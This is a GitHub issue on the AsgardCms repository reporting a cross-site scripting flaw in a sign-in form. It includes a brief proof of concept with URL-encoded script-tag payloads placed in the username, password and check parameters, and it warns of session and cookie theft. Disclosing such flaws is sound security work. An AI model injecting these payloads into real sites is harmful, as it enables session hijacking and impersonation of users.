There is one xss vulnerability

AsgardCms / Platform

A modular multilingual CMS built with Laravel 5.

https://asgardcms.com/

MIT License

782 stars 241 forks source link

There is one xss vulnerability #846

Open flowertimes opened 1 year ago

flowertimes commented 1 year ago

There is one xss vulnerability

poc

"'>

The following changes have been applied to the original request: The value of parameter 'signin_nick' has been set to '% 3E% 22% 27% 3E% 3Cscript% 3Early% 2869% 29% 3C% 2Fscript% 3E' The value of parameter 'signin_pass' has been set to'% 3E% 22% 27% 3E% 3Cscript% 3Early% 2869% 29% 3C% 2Fscript% 3E ' The value of parameter 'signin_check' has been set to '% 3E% 22% 27% 3E% 3Cscript% 3Early% 2869% 29% 3C% 2Fscript% 3E' 微信截图_20230609164701 微信截图_20230609164732

flowertimes commented 1 year ago

There is a XSS vulnerability .May steal or manipulate customer sessions and cookies, which may be used to impersonate legitimate users, allowing hackers to view or change user records and execute transactions as that user.